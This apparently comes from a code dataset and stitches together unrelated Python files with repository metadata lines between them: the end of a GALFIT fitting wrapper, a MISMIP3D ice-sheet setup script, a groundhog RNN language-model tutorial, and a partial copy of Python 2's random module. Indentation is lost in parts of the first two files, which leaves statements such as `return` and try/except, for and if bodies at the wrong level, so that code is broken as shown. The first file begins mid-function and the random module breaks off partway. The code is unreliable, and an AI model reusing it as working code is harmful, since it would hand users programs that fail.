allObjects = allObjects + dedent(thisObject)
n = n + 1
    # return chi-squared measure of likelihood
method = '2'
inputText = """
===============================================================================
# IMAGE and GALFIT CONTROL PARAMETERS
A) {image} # Input data image (FITS file)
B) {folder}{temp}{imageName}-output.fits # Output data image block
C) none # Sigma image name (made from data if blank or "none")
D) none #/Users/rs548/Documents/Science/Blended/PSF-g.fits # # Input PSF image and (optional) diffusion kernel
E) 1 # PSF fine sampling factor relative to data
F) none # Bad pixel mask (FITS image or ASCII coord list)
G) none # File with parameter constraints (ASCII file)
H) 1448 2048 889 1489 # Image region to fit (xmin xmax ymin ymax)
I) 100 100 # Size of the convolution box (x y)
J) 25.110 # Magnitude photometric zeropoint
K) 0.396127 0.396127 # Plate scale (dx dy) [arcsec per pixel]
O) regular # Display type (regular, curses, both)
P) {method} # Choose: 0=optimize, 1=model, 2=imgblock, 3=subcomps
# INITIAL FITTING PARAMETERS
#
# For object type, the allowed functions are:
# nuker, sersic, expdisk, devauc, king, psf, gaussian, moffat,
# ferrer, powsersic, sky, and isophote.
#
# Hidden parameters will only appear when they're specified:
# C0 (diskyness/boxyness),
# Fn (n=integer, Azimuthal Fourier Modes),
# R0-R10 (PA rotation, for creating spiral structures).
#
# -----------------------------------------------------------------------------
# par) par value(s) fit toggle(s) # parameter description
# -----------------------------------------------------------------------------
{allObjects}
================================================================================
""".format(**vars())
inputFile = open(folder + temp
+ imageName + '.feedme', "w")
inputFile.write(inputText)
inputFile.close()
log_file = open(imageName + "-log.txt", "a")
#'-imax', '99',
print('Galfit.py is about to call galfit for chiSquared')
print(inputText)
t0 = time.time()
subprocess.call(['/usr/local/bin/galfit',
folder + temp
+ imageName + '.feedme'],
stdout=log_file)
print('galfit.chisquared took ',time.time() - t0, 's to run galfit')
log_file.close()
output = fits.open(folder + temp
+ imageName + '-output.fits')
#Get chi squared from fits file
chiSquared = output[2].header['CHISQ']
#remove(folder + temp
# + imageName + '-output.fits')
print('galfit.chisquared gives a value of ', chiSquared)
return chiSquared
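# --- Hypothetical usage sketch (not part of the original module) ---
# The file name, folder path and source-dict values below are illustrative
# assumptions; the model tuples follow the indexing used by chisquared()
# above (sersic: indices 0-10, sky: indices 0-1).
if __name__ == '__main__':
    source = {'expRad_r_sdss': 2.5, 'expAB_r_sdss': 0.8}
    optimise('example.fits', '/path/to/images/', source, field='SDSS')
    model = [('sersic', 75.0, 75.0, 20.0, 4.0, 4.0, 0, 0, 0, 1.0, 0.0),
             ('sky', 0.001)]
    print(chisquared('example.fits', model))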
|
raphaelshirley/regphot
|
regphot/galfit.py
|
Python
|
mit
| 12,302
|
[
"Gaussian"
] |
579b28116f68a3a1a7079e51031130181b27497209e500f6d7fa7ec6c0a580f1
|
#!/usr/bin/env python
# Copyright (C) 2012, 2014 Moritz Huetten
# geometry setup MISMIP3D P75S/P10S-experiment
from pylab import *
import os
import sys
import getopt
import math
#from numpy import *
import numpy as np
try:
from netCDF4 import Dataset as NC
except:
print "netCDF4 is not installed!"
sys.exit(1)
subgl = False
#### command line arguments ####
try:
opts, args = getopt.getopt(sys.argv[1:], "si:a:", ["subgl", "inpath=", "amplitude="])
for opt, arg in opts:
if opt in ("-s", "--subgl"):
subgl = True
if opt in ("-i", "--inpath"):
inpath = arg
if opt in ("-a", "--amplitude"):
            a = arg  # perturbation amplitude for tauc
except getopt.GetoptError:
print 'Incorrect command line arguments'
sys.exit(2)
a = float(a) * 100.0
a = int(a)
if a == 75:
WRIT_FILE = 'MISMIP3D_P75S_initialSetup.nc'
a = 0.75
elif a == 10:
WRIT_FILE = 'MISMIP3D_P10S_initialSetup.nc'
a = 0.1
else:
WRIT_FILE = 'dummy'
######## geometry setup (moritz.huetten@pik) #########
### CONSTANTS ###
secpera = 31556926.
ice_density = 910.0
yExtent = 2 * 50 # in km
xExtent = 2 * 800 # in km
# load data from Stnd-experiment
try:
name = inpath # + '.nc'
infile = NC(name, 'r')
except Exception:
print "file '%s' not found" % name
sys.exit(2)
# exit(-1)
x = squeeze(infile.variables["x"][:])
nx = len(x)
boxWidth = x[nx - 1] / ((nx - 1) / 2) / 1e3
# grid size: # of boxes
ny = int(np.floor(yExtent / boxWidth / 2) * 2 + 1) # make it an odd number
# grid size: extent in km's, origin (0,0) in the center of the domain
y = np.linspace(-yExtent / 2, yExtent / 2, ny) * 1000.0
nxcenter = int(np.floor(0.5 * nx))
nycenter = int(np.floor(0.5 * ny))
thk = np.zeros((ny, nx))
topg = np.zeros((ny, nx))
ice_surface_temp = np.zeros((ny, nx))
precip = np.zeros((ny, nx))
tauc = np.zeros((ny, nx))
print "Informations from createSetup_PXXS.py:"
print "grid size:"
print nx
print ny
print "grid size center:"
print nxcenter
print nycenter
print "domain range in meters:"
print "x-dir:"
print x[0]
print x[nx - 1]
print "y-dir:"
print y[0]
print y[ny - 1]
print "y-boxWidth:"
print y[ny - 1] - y[ny - 2]
# load data from Stnd-result:
Thk_stnd = squeeze(infile.variables["thk"][:])
precip_stnd = squeeze(infile.variables["climatic_mass_balance"][:])
Topg_stnd = squeeze(infile.variables["topg"][:])
if subgl:
Gl_mask = squeeze(infile.variables["gl_mask"][:])
print "number snapshots:"
print len(Thk_stnd[:, 0, 0])
lastslice = len(Thk_stnd[:, 0, 0]) - 1
thk_stnd = Thk_stnd[lastslice, :, :]
precip_stnd = precip_stnd[lastslice, :, :]
topg_stnd = Topg_stnd[lastslice, :, :]
if subgl:
gl_mask = Gl_mask[lastslice, :, :]
# load bedrock geometry topg from Stnd-experiment:
for i in range(0, nx):
for j in range(0, ny):
topg[j, i] = topg_stnd[0, i]
# load initial ice-thickness:
for i in range(0, nx):
for j in range(0, ny):
thk[j, i] = thk_stnd[0, i]
# load precipitation field:
for i in range(0, nx):
for j in range(0, ny):
precip[j, i] = precip_stnd[0, 0] / secpera / ice_density
print "snow per year in meters"
print precip_stnd[0, 0]
# defining dummy temperature:
for i in range(0, nx):
for j in range(0, ny):
ice_surface_temp[j, i] = 268.15
# number of grid cells
Mx = x.shape[0]
middle = (Mx - 1) / 2
x1 = x[middle:Mx] / 1000.0 # km
dx = x1[1] - x1[0]
thk_stnd1 = thk_stnd[1, middle:Mx] # 1D
Mask = squeeze(infile.variables["mask"][:])
mask = Mask[lastslice, :, :]
mask = mask[1, middle:Mx] # 1D
# find grounding line
for i in range(mask.shape[0]):
if (thk_stnd1[i] > 0 and mask[i] == 2 and mask[i + 1] == 3):
xg = x1[i]
        if subgl:
xg_new = xg + dx / 2.0 - (1 - gl_mask[0, i]) * dx + gl_mask[0, i + 1] * dx
else:
xg_new = xg + dx / 2.0
print "old grounding line at position:"
print xg, "km"
print "new grounding line at position:"
print xg_new, "km"
xg = xg_new * 1.0e3
# defining tauc:
xb = xg
yb = 0
xc = 150e3
yc = 10e3
C = 1.0e7
a = float(a)
for i in range(nxcenter, nx):
for j in range(0, ny):
tauc[j, i] = C * (1 - a * math.exp(-(x[i] - xb) ** 2 / (2 * xc ** 2) - (y[j] - yb) ** 2 / (2 * yc ** 2)))
for i in range(0, nxcenter):
for j in range(0, ny):
tauc[j, i] = C * (1 - a * math.exp(-(x[i] + xb) ** 2 / (2 * xc ** 2) - (y[j] - yb) ** 2 / (2 * yc ** 2)))
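# A vectorized equivalent of the two tauc loops above (a hypothetical
# reference sketch; numpy broadcasting removes the explicit i/j loops).
# tauc_vec is not used below -- it only illustrates the same computation:
X, Y = np.meshgrid(x, y)
gauss_r = np.exp(-(X - xb) ** 2 / (2 * xc ** 2) - (Y - yb) ** 2 / (2 * yc ** 2))
gauss_l = np.exp(-(X + xb) ** 2 / (2 * xc ** 2) - (Y - yb) ** 2 / (2 * yc ** 2))
tauc_vec = np.where(X >= x[nxcenter], C * (1 - a * gauss_r), C * (1 - a * gauss_l))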
##### define dimensions in NetCDF file #####
ncfile = NC(WRIT_FILE, 'w', format='NETCDF3_CLASSIC')
xdim = ncfile.createDimension('x', nx)
ydim = ncfile.createDimension('y', ny)
##### define variables, set attributes, write data #####
# format: ['units', 'long_name', 'standard_name', '_FillValue', array]
vars = {'y': ['m',
'y-coordinate in Cartesian system',
'projection_y_coordinate',
None,
y],
'x': ['m',
'x-coordinate in Cartesian system',
'projection_x_coordinate',
None,
x],
'thk': ['m',
'floating ice shelf thickness',
'land_ice_thickness',
1.0,
thk],
'topg': ['m',
'bedrock surface elevation',
'bedrock_altitude',
-600.0,
topg],
'ice_surface_temp': ['K',
'annual mean air temperature at ice surface',
'surface_temperature',
248.0,
ice_surface_temp],
'climatic_mass_balance': ['kg m-2 year-1',
'mean annual net ice equivalent accumulation rate',
'land_ice_surface_specific_mass_balance_flux',
0.2 * ice_density,
precip],
'tauc': ['Pa',
'yield stress for basal till (plastic or pseudo-plastic model)',
'yield_stress_for_basal_till',
1e6,
tauc],
}
for name in vars.keys():
[_, _, _, fill_value, data] = vars[name]
if name in ['x', 'y']:
var = ncfile.createVariable(name, 'f4', (name,))
else:
var = ncfile.createVariable(name, 'f4', ('y', 'x'), fill_value=fill_value)
for each in zip(['units', 'long_name', 'standard_name'], vars[name]):
if each[1]:
setattr(var, each[0], each[1])
var[:] = data
# finish up
ncfile.close()
print "NetCDF file ", WRIT_FILE, " created"
print ''
|
talbrecht/pism_pik07
|
examples/mismip/mismip3d/setup_PXXS.py
|
Python
|
gpl-3.0
| 6,670
|
[
"NetCDF"
] |
7c0dff9c100642e35b69bc00c94a099a41d64460527ffba48d41ed15932c685b
|
"""
Test of the classical LM model for language modelling
"""
from groundhog.datasets import LMIterator
from groundhog.trainer.SGD_adadelta import SGD
from groundhog.mainLoop import MainLoop
from groundhog.layers import MultiLayer, \
RecurrentMultiLayer, \
RecurrentMultiLayerInp, \
RecurrentMultiLayerShortPath, \
RecurrentMultiLayerShortPathInp, \
RecurrentMultiLayerShortPathInpAll, \
SoftmaxLayer, \
LastState,\
UnaryOp, \
Operator, \
Shift, \
GaussianNoise, \
SigmoidLayer
from groundhog.layers import maxpool, \
maxpool_ntimes, \
last, \
last_ntimes,\
tanh, \
sigmoid, \
rectifier,\
hard_sigmoid, \
hard_tanh
from groundhog.models import LM_Model
from theano.sandbox.scan import scan
import numpy
import theano
import theano.tensor as TT
linear = lambda x:x
theano.config.allow_gc = False
def get_text_data(state):
def out_format (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
def out_format_valid (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
train_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
seq_len = state['seqlen'],
mode="train",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format,
can_fit=True)
valid_data = LMIterator(
batch_size=state['bs'],
path=state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences = True,
seq_len= state['seqlen'],
mode="valid",
reset =state['reset'],
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
test_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences=True,
seq_len= state['seqlen'],
mode="test",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format_valid,
can_fit=True)
if 'wiki' in state['path']:
test_data = None
return train_data, valid_data, test_data
def jobman(state, channel):
# load dataset
rng = numpy.random.RandomState(state['seed'])
    # declare the dimensionalities of the input and output
if state['chunks'] == 'words':
state['n_in'] = 10000
state['n_out'] = 10000
else:
state['n_in'] = 50
state['n_out'] = 50
train_data, valid_data, test_data = get_text_data(state)
## BEGIN Tutorial
### Define Theano Input Variables
x = TT.lvector('x')
y = TT.lvector('y')
h0 = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
### Neural Implementation of the Operators: \oplus
#### Word Embedding
emb_words = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inp_nhids']),
activation=eval(state['inp_activ']),
init_fn='sample_weights_classic',
weight_noise=state['weight_noise'],
rank_n_approx = state['rank_n_approx'],
scale=state['inp_scale'],
sparsity=state['inp_sparse'],
learn_bias = True,
bias_scale=eval(state['inp_bias']),
name='emb_words')
#### Deep Transition Recurrent Layer
rec = eval(state['rec_layer'])(
rng,
eval(state['nhids']),
activation = eval(state['rec_activ']),
#activation = 'TT.nnet.sigmoid',
bias_scale = eval(state['rec_bias']),
scale=eval(state['rec_scale']),
sparsity=eval(state['rec_sparse']),
init_fn=eval(state['rec_init']),
weight_noise=state['weight_noise'],
name='rec')
    #### Stitching them together
##### (1) Get the embedding of a word
x_emb = emb_words(x, no_noise_bias=state['no_noise_bias'])
##### (2) Embedding + Hidden State via DT Recurrent Layer
reset = TT.scalar('reset')
rec_layer = rec(x_emb, n_steps=x.shape[0],
init_state=h0*reset,
no_noise_bias=state['no_noise_bias'],
truncate_gradient=state['truncate_gradient'],
batch_size=1)
### Neural Implementation of the Operators: \lhd
#### Softmax Layer
output_layer = SoftmaxLayer(
rng,
eval(state['nhids'])[-1],
state['n_out'],
scale=state['out_scale'],
bias_scale=state['out_bias_scale'],
init_fn="sample_weights_classic",
weight_noise=state['weight_noise'],
sparsity=state['out_sparse'],
sum_over_time=True,
name='out')
### Few Optional Things
#### Direct shortcut from x to y
if state['shortcut_inpout']:
shortcut = MultiLayer(
rng,
n_in=state['n_in'],
n_hids=eval(state['inpout_nhids']),
activations=eval(state['inpout_activ']),
init_fn='sample_weights_classic',
weight_noise = state['weight_noise'],
scale=eval(state['inpout_scale']),
sparsity=eval(state['inpout_sparse']),
learn_bias=eval(state['inpout_learn_bias']),
bias_scale=eval(state['inpout_bias']),
name='shortcut')
#### Learning rate scheduling (1/(1+n/beta))
state['clr'] = state['lr']
def update_lr(obj, cost):
stp = obj.step
if isinstance(obj.state['lr_start'], int) and stp > obj.state['lr_start']:
time = float(stp - obj.state['lr_start'])
new_lr = obj.state['clr']/(1+time/obj.state['lr_beta'])
obj.lr = new_lr
if state['lr_adapt']:
rec.add_schedule(update_lr)
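    # Worked example (illustrative numbers): with clr = 1.0 and
    # lr_beta = 19000, new_lr = clr / (1 + time / lr_beta) halves the
    # learning rate 19000 steps after lr_start and quarters it after
    # 57000 steps, since 1 / (1 + 3) = 0.25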
### Neural Implementations of the Language Model
#### Training
if state['shortcut_inpout']:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias'],
additional_inputs=[shortcut(x)]).train(target=y,
scale=numpy.float32(1./state['seqlen']))
else:
train_model = output_layer(rec_layer,
no_noise_bias=state['no_noise_bias']).train(target=y,
scale=numpy.float32(1./state['seqlen']))
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if state['carry_h0']:
train_model.updates += [(h0, nw_h0)]
#### Validation
h0val = theano.shared(numpy.zeros((eval(state['nhids'])[-1],), dtype='float32'))
rec_layer = rec(emb_words(x, use_noise=False),
n_steps = x.shape[0],
batch_size=1,
init_state=h0val*reset,
use_noise=False)
nw_h0 = rec_layer.out[rec_layer.out.shape[0]-1]
if not state['shortcut_inpout']:
valid_model = output_layer(rec_layer,
use_noise=False).validate(target=y, sum_over_time=True)
else:
valid_model = output_layer(rec_layer,
additional_inputs=[shortcut(x, use_noise=False)],
use_noise=False).validate(target=y, sum_over_time=True)
valid_updates = []
if state['carry_h0']:
valid_updates = [(h0val, nw_h0)]
valid_fn = theano.function([x,y, reset], valid_model.cost,
name='valid_fn', updates=valid_updates)
#### Sampling
##### single-step sampling
def sample_fn(word_tm1, h_tm1):
x_emb = emb_words(word_tm1, use_noise = False, one_step=True)
h0_ = rec(x_emb, state_before=h_tm1, one_step=True, use_noise=False)[-1]
word = output_layer.get_sample(state_below=h0_, temp=1.)
return word, h0_
##### scan for iterating the single-step sampling multiple times
[samples, summaries], updates = scan(sample_fn,
states = [
TT.alloc(numpy.int64(0), state['sample_steps']),
TT.alloc(numpy.float32(0), 1, eval(state['nhids'])[-1])],
n_steps= state['sample_steps'],
name='sampler_scan')
##### define a Theano function
sample_fn = theano.function([], [samples],
updates=updates, profile=False, name='sample_fn')
##### Load a dictionary
dictionary = numpy.load(state['dictionary'])
if state['chunks'] == 'chars':
dictionary = dictionary['unique_chars']
else:
dictionary = dictionary['unique_words']
def hook_fn():
sample = sample_fn()[0]
print 'Sample:',
if state['chunks'] == 'chars':
print "".join(dictionary[sample])
else:
for si in sample:
print dictionary[si],
print
### Build and Train a Model
#### Define a model
model = LM_Model(
cost_layer = train_model,
weight_noise_amount=state['weight_noise_amount'],
valid_fn = valid_fn,
clean_before_noise_fn = False,
noise_fn = None,
rng = rng)
if state['reload']:
model.load(state['prefix']+'model.npz')
#### Define a trainer
##### Training algorithm (SGD)
algo = SGD(model, state, train_data)
##### Main loop of the trainer
main = MainLoop(train_data,
valid_data,
test_data,
model,
algo,
state,
channel,
train_cost = False,
hooks = hook_fn,
validate_postprocess = eval(state['validate_postprocess']))
main.main()
## END Tutorial
if __name__=='__main__':
state = {}
# complete path to data (cluster specific)
state['seqlen'] = 100
state['path']= "/data/lisa/data/PennTreebankCorpus/pentree_char_and_word.npz"
state['dictionary']= "/data/lisa/data/PennTreebankCorpus/dictionaries.npz"
state['chunks'] = 'chars'
state['seed'] = 123
    # flag .. you don't need to change it. It says what to do if the cost
    # becomes NaN: you could raise an error, though I would leave it set to
    # 'warn'
# DATA
    # For wikipedia the validation set is extremely large, which is very
    # time wasteful. This value is only used for the validation set, and
    # IMHO should be something like seqlen * 10000 (i.e. the validation
    # should only be 10000 steps)
state['reset'] = -1
    # For music / word level I think 50 is a good idea. For characters this
    # should be at least 100 (I think there are problems with reaching state
    # of the art otherwise). Note most people use 200!
    # The job stops when the learning rate declines to this value. It can be
    # useful, because sometimes it is hopeless to wait for the validation
    # error to get below minerr, or for the time to expire
state['minlr'] = float(5e-7)
# Layers
# Input
    # Input weights are sampled from a Gaussian with std=scale; this is the
    # standard way to initialize
state['rank_n_approx'] = 0
state['inp_nhids'] = '[400]'
state['inp_activ'] = '[linear]'
state['inp_bias'] = '[0.]'
state['inp_sparse']= -1 # dense
state['inp_scale'] = .1
# This is for the output weights
state['out_scale'] = .1
state['out_bias_scale'] = -.5
state['out_sparse'] = -1
# HidLayer
# Hidden units on for the internal layers of DT-RNN. Having a single
# value results in a standard RNN
state['nhids'] = '[200, 200]'
# Activation of each layer
state['rec_activ'] = '"TT.nnet.sigmoid"'
state['rec_bias'] = '.0'
state['rec_sparse'] ='20'
state['rec_scale'] = '1.'
# sample_weights - you rescale the weights such that the largest
# singular value is scale
# sample_weights_classic : just sample weights from a gaussian with std
# equal to scale
state['rec_init'] = "'sample_weights'"
state['rec_layer'] = 'RecurrentMultiLayerShortPathInpAll'
# SGD params
state['bs'] = 1 # the size of the minibatch
    state['lr'] = 1.  # initial learning rate
state['cutoff'] = 1. # threshold for gradient rescaling
state['moment'] = 0.995 #-.1 # momentum
# Do not optimize these
state['weight_noise'] = True # white Gaussian noise in weights
state['weight_noise_amount'] = 0.075 # standard deviation
# maximal number of updates
state['loopIters'] = int(1e8)
# maximal number of minutes to wait until killing job
state['timeStop'] = 48*60 # 48 hours
# Construct linear connections from input to output. These are factored
# (like the rank_n) to deal with the possible high dimensionality of the
# input, but it is a linear projection that feeds into the softmax
state['shortcut_inpout'] = False
state['shortcut_rank'] = 200
# Main Loop
    # Make this a decently large value. Otherwise you waste a lot of
# memory keeping track of the training error (and other things) at each
# step + the stdout becomes extremely large
state['trainFreq'] = 100
state['hookFreq'] = 5000
state['validFreq'] = 1000
state['saveFreq'] = 15 # save every 15 minutes
state['prefix'] = 'model_' # prefix of the save files
state['reload'] = False # reload
state['overwrite'] = 1
    # Threshold should be 1.004 for PPL; for entropy (which is what
    # everything returns) it should be much smaller. Running value is 1.0002.
    # We should not hyperoptimize this
state['divide_lr'] = 2.
state['cost_threshold'] = 1.0002
state['patience'] = 1
state['validate_postprocess'] = 'lambda x:10**(x/numpy.log(10))'
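    # Note: 10**(x / log(10)) equals exp(x), so this converts the validation
    # cost from nats (entropy) to perplexity, e.g. a cost of 4.6 nats
    # corresponds to a perplexity of roughly exp(4.6) ~= 99.5 (illustrative)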
state['truncate_gradient'] = 80 # truncated BPTT
state['lr_adapt'] = 0 # 1/(1 + n/n0) scheduling
state['lr_beta'] = 10*1900.
state['lr_start'] = 'on_error'
state['no_noise_bias'] = True # do not use weight noise for biases
state['carry_h0'] = True # carry over h0 across updates
state['sample_steps'] = 80
# Do not change these
state['minerr'] = -1
state['shift'] = 1 # n-step forward prediction
state['cutoff_rescale_length'] = False
jobman(state, None)
|
vseledkin/LV_groundhog
|
tutorials/DT_RNN_Tut_Adadelta.py
|
Python
|
bsd-3-clause
| 14,259
|
[
"Gaussian"
] |
24d2e79ffc663feff87efe329a6d8fd5051e49a3415bf1aa0a74930397b8b170
|
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* Without a direct way to compute N steps forward, the semantics of
jumpahead(n) are weakened to simply jump to another distant state and rely
on the large period to avoid overlapping sequences.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from __future__ import division
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from binascii import hexlify as _hexlify
import hashlib as _hashlib
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
"randrange","shuffle","normalvariate","lognormvariate",
"expovariate","vonmisesvariate","gammavariate","triangular",
"gauss","betavariate","paretovariate","weibullvariate",
"getstate","setstate","jumpahead", "WichmannHill", "getrandbits",
"SystemRandom"]
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)
BPF = 53 # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley. Adapted by Raymond Hettinger for use with
# the Mersenne Twister and os.urandom() core generators.
import _random
class Random(_random.Random):
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state. Especially useful for multi-threaded programs, creating
a different instance of Random for each thread, and using the jumpahead()
method to ensure that the generated sequences seen by each thread don't
overlap.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), setstate() and jumpahead().
Optionally, implement a getrandbits() method so that randrange() can cover
arbitrarily large ranges.
"""
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self.seed(x)
self.gauss_next = None
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
"""
if a is None:
try:
a = long(_hexlify(_urandom(16)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
super(Random, self).seed(a)
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, super(Random, self).getstate(), self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 3:
version, internalstate, self.gauss_next = state
super(Random, self).setstate(internalstate)
elif version == 2:
version, internalstate, self.gauss_next = state
# In version 2, the state was saved as signed ints, which causes
# inconsistencies between 32/64-bit systems. The state is
# really unsigned 32-bit ints, so we convert negative ints from
# version 2 to positive longs for version 3.
try:
internalstate = tuple( long(x) % (2**32) for x in internalstate )
except ValueError, e:
raise TypeError, e
super(Random, self).setstate(internalstate)
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Change the internal state to one that is likely far away
from the current state. This method will not be in Py3.x,
so it is better to simply reseed.
"""
# The super.jumpahead() method uses shuffling to change state,
# so it needs a large and "interesting" n to work with. Here,
# we use hashing to create a large n for the shuffle.
s = repr(n) + repr(self.getstate())
n = int(_hashlib.new('sha512', s).hexdigest(), 16)
super(Random, self).jumpahead(n)
## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.
## -------------------- pickle support -------------------
def __getstate__(self): # for pickle
return self.getstate()
def __setstate__(self, state): # for pickle
self.setstate(state)
def __reduce__(self):
return self.__class__, (), self.getstate()
## -------------------- integer methods -------------------
def randrange(self, start, stop=None, step=1, int=int, default=None,
maxwidth=1L<<BPF):
"""Choose a random item from range(start, stop[, step]).
This fixes the problem with randint() which includes the
endpoint; in Python this is usually not what you want.
Do not supply the 'int', 'default', and 'maxwidth' arguments.
"""
# This code is a bit messy to make it fast for the
# common case while still doing adequate error checking.
istart = int(start)
if istart != start:
raise ValueError, "non-integer arg 1 for randrange()"
if stop is default:
if istart > 0:
if istart >= maxwidth:
return self._randbelow(istart)
return int(self.random() * istart)
raise ValueError, "empty range for randrange()"
# stop argument supplied.
istop = int(stop)
if istop != stop:
raise ValueError, "non-integer stop for randrange()"
width = istop - istart
if step == 1 and width > 0:
# Note that
# int(istart + self.random()*width)
# instead would be incorrect. For example, consider istart
# = -2 and istop = 0. Then the guts would be in
# -2.0 to 0.0 exclusive on both ends (ignoring that random()
# might return 0.0), and because int() truncates toward 0, the
# final result would be -1 or 0 (instead of -2 or -1).
# istart + int(self.random()*width)
# would also be incorrect, for a subtler reason: the RHS
# can return a long, and then randrange() would also return
# a long, but we're supposed to return an int (for backward
# compatibility).
if width >= maxwidth:
return int(istart + self._randbelow(width))
return int(istart + int(self.random()*width))
if step == 1:
raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width)
# Non-unit step argument supplied.
istep = int(step)
if istep != step:
raise ValueError, "non-integer step for randrange()"
if istep > 0:
n = (width + istep - 1) // istep
elif istep < 0:
n = (width + istep + 1) // istep
else:
raise ValueError, "zero step for randrange()"
if n <= 0:
raise ValueError, "empty range for randrange()"
if n >= maxwidth:
return istart + istep*self._randbelow(n)
return istart + istep*int(self.random() * n)
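    ## Example (illustrative): randrange(20) returns an int in [0, 20);
    ## randrange(0, 10, 2) returns one of 0, 2, 4, 6, 8.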
def randint(self, a, b):
"""Return random integer in range [a, b], including both end points.
"""
return self.randrange(a, b+1)
def _randbelow(self, n, _log=_log, int=int, _maxwidth=1L<<BPF,
_Method=_MethodType, _BuiltinMethod=_BuiltinMethodType):
"""Return a random int in the range [0,n)
Handles the case where n has more bits than returned
by a single call to the underlying generator.
"""
try:
getrandbits = self.getrandbits
except AttributeError:
pass
else:
# Only call self.getrandbits if the original random() builtin method
# has not been overridden or if a new getrandbits() was supplied.
# This assures that the two methods correspond.
if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method:
k = int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2)
r = getrandbits(k)
while r >= n:
r = getrandbits(k)
return r
if n >= _maxwidth:
_warn("Underlying random() generator does not supply \n"
"enough bits to choose from a population range this large")
return int(self.random() * n)
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty
def shuffle(self, x, random=None, int=int):
"""x, random=random.random -> shuffle list x in place; return None.
Optional arg random is a 0-argument function returning a random
float in [0.0, 1.0); by default, the standard random.random.
"""
if random is None:
random = self.random
for i in reversed(xrange(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = int(random() * (i+1))
x[i], x[j] = x[j], x[i]
def sample(self, population, k):
"""Chooses k unique random elements from a population sequence.
Returns a new list containing elements from the population while
leaving the original population unchanged. The resulting list is
in selection order so that all sub-slices will also be valid random
samples. This allows raffle winners (the sample) to be partitioned
into grand prize and second place winners (the subslices).
Members of the population need not be hashable or unique. If the
population contains repeats, then each occurrence is a possible
selection in the sample.
To choose a sample in a range of integers, use xrange as an argument.
This is especially fast and space efficient for sampling from a
large population: sample(xrange(10000000), 60)
"""
# Sampling without replacement entails tracking either potential
# selections (the pool) in a list or previous selections in a set.
# When the number of selections is small compared to the
# population, then tracking selections is efficient, requiring
# only a small set and an occasional reselection. For
# a larger number of selections, the pool tracking method is
# preferred since the list takes less space than the
# set and it doesn't suffer from frequent reselections.
n = len(population)
if not 0 <= k <= n:
raise ValueError("sample larger than population")
random = self.random
_int = int
result = [None] * k
setsize = 21 # size of a small set minus size of an empty list
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
if n <= setsize or hasattr(population, "keys"):
# An n-length list is smaller than a k-length set, or this is a
# mapping type so the other algorithm wouldn't work.
pool = list(population)
for i in xrange(k): # invariant: non-selected at [0,n-i)
j = _int(random() * (n-i))
result[i] = pool[j]
pool[j] = pool[n-i-1] # move non-selected item into vacancy
else:
try:
selected = set()
selected_add = selected.add
for i in xrange(k):
j = _int(random() * n)
while j in selected:
j = _int(random() * n)
selected_add(j)
result[i] = population[j]
except (TypeError, KeyError): # handle (at least) sets
if isinstance(population, list):
raise
return self.sample(tuple(population), k)
return result
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
def triangular(self, low=0.0, high=1.0, mode=None):
"""Triangular distribution.
Continuous distribution bounded by given lower and upper limits,
and having a given mode value in-between.
http://en.wikipedia.org/wiki/Triangular_distribution
"""
u = self.random()
c = 0.5 if mode is None else (mode - low) / (high - low)
if u > c:
u = 1.0 - u
c = 1.0 - c
low, high = high, low
return low + (high - low) * (u * c) ** 0.5
